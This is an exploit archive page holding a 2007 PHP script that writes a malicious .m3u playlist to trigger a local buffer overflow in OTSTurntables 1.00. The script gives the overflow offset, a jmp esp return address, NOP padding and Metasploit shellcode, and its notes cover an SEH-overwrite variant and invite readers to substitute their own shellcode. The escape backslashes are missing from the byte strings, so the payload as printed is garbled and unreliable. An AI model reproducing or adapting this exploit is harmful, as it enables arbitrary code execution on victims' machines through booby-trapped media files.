OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit
# Published : 2007-09-02
# Author : 0x58
# Previous Title : AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit
# Next Title : Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit

<?php
/*
OTSTurntables 1.00 Buffer OverFlow 0days
224 bytes available for shellcode,, you can replace it with you favourite one,, 
0x77394540      jmp esp in shell32.dll Winxp sp0
exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] 
&& if you want to exploit this vul with SEH ,, take some infos :p
[ A x 277 ] + [EIP] + [B x 608] + [Pointer to next SEH record] + [SE handler]
by : 0x58
Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,!
*/
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = 
"x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84".
"xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d".
"xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91".
"x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5".
"x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe".
"x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc".
"x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53".
"xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0".
"xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc".
"xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0".
"xe1xd1xfexd8";
$bof = str_repeat("A",277)."x40x45x39x77".str_repeat("x90",10).$shellcode;
$filename = "OTSTurntables.m3u";
$file = fopen($filename,"w+");
fputs($file,"#EXTM3Urn");
fputs($file,"#EXTINF:0,TITLErn");
fputs($file,"C:/");
fputs($file,$bof);
fclose($file);
echo "Exploit generated in : ".$filename."<br>";
?>

# www.Syue.com [2007-09-02]